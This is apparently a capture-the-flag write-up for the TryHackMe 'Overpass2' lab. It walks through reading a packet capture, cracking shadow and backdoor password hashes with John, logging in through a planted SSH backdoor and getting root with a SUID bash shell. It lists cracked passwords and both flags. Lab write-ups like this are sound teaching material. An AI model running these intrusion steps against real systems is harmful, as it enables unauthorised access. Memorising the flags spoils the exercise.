OverPass2

Target Details

• IP: 10.10.145.49

Analyze pcap file

• Download pcap file

• Open with wireshark

  sudo wireshark

• Follow TCP streams, you'll find all the answers to the questions

Crack Hashes from the WireShark packets

• Download fasttrack wordlist

• Dump users from shadow file while analyzing packets in shadow_dump.txt file

• User Shadow File Passwords using John

  john -w=/usr/share/wordlists/fasttrack.txt shadow_dump.txt

  user hashes are stored in shadow_dump.txt file

  Username	Password
  bee	secret12
  szymex	abcd123
  muirland	1qaz2wsx
  paradox	secuirty3

• Get hash from packet file and hard coded salt from ssh-backdoor GitHub repo

• Store them in hash.txt file in hash:salt format

• Crack using John

  john -w=/usr/share/wordlists/rockyou.txt hash.txt

  Username	Password
  james	november16

Hack Again

• Login using Backdoor SSH, since we already know the password

  ssh -p 2222 james@10.10.145.49

• Get User Flag

  cat /home/james/user.txt
  # thm{d119b4fa8c497ddb0525f7ad200e6567}

• On listing hidden files, we get .suid_bash which can be run as root

  /home/james/.suid_bash -p
  .suid_bash-4.4#

• We've rooted the machine

  .suid_bash-4.4# whoami
  root

• Get root flag

  .suid_bash-4.4# cat /root/root.txt
  thm{d53b2684f169360bb9606c333873144d}